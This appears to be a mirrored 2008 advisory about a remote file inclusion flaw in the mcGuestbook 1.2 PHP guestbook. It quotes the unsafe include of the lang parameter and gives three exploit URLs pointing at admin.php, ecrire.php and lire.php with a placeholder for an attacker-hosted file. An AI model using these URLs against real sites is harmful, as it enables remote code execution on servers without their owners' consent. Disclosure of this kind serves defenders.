mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability

2008.06.28

Credit: Ghost hacker

Risk: High

Local: No

Remote: No

CVE: N/A

CWE: N/A

######################################
mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
######################################
[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
[~] HOME : www.Real-Hack.net | )(_o/ \o_)( |
[~] Email : Ghost-r00t_at_Hotmail&#46;com |/ /\ \|
[~] Script : mcGuestbook 1.2
[~] Download Script : http://www.phpbank.net/admin/download.php?id=155
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Error ( admin.php + ecrire.php + lire.php ) :
include "$lang";
[~] Exploit :
http://xxxx/[Path]/ecrire.php?lang=[EVIL]
http://xxxx/[Path]/admin.php?lang=[EVIL]
http://xxxx/[Path]/lire.php?lang=[EVIL]
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
All Member Real Hack And All My Friends ..
##############################
Real Hack Team ( R-H ) ..
##############################

References:

http://seclists.org/bugtraq/2008/Jun/0203.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.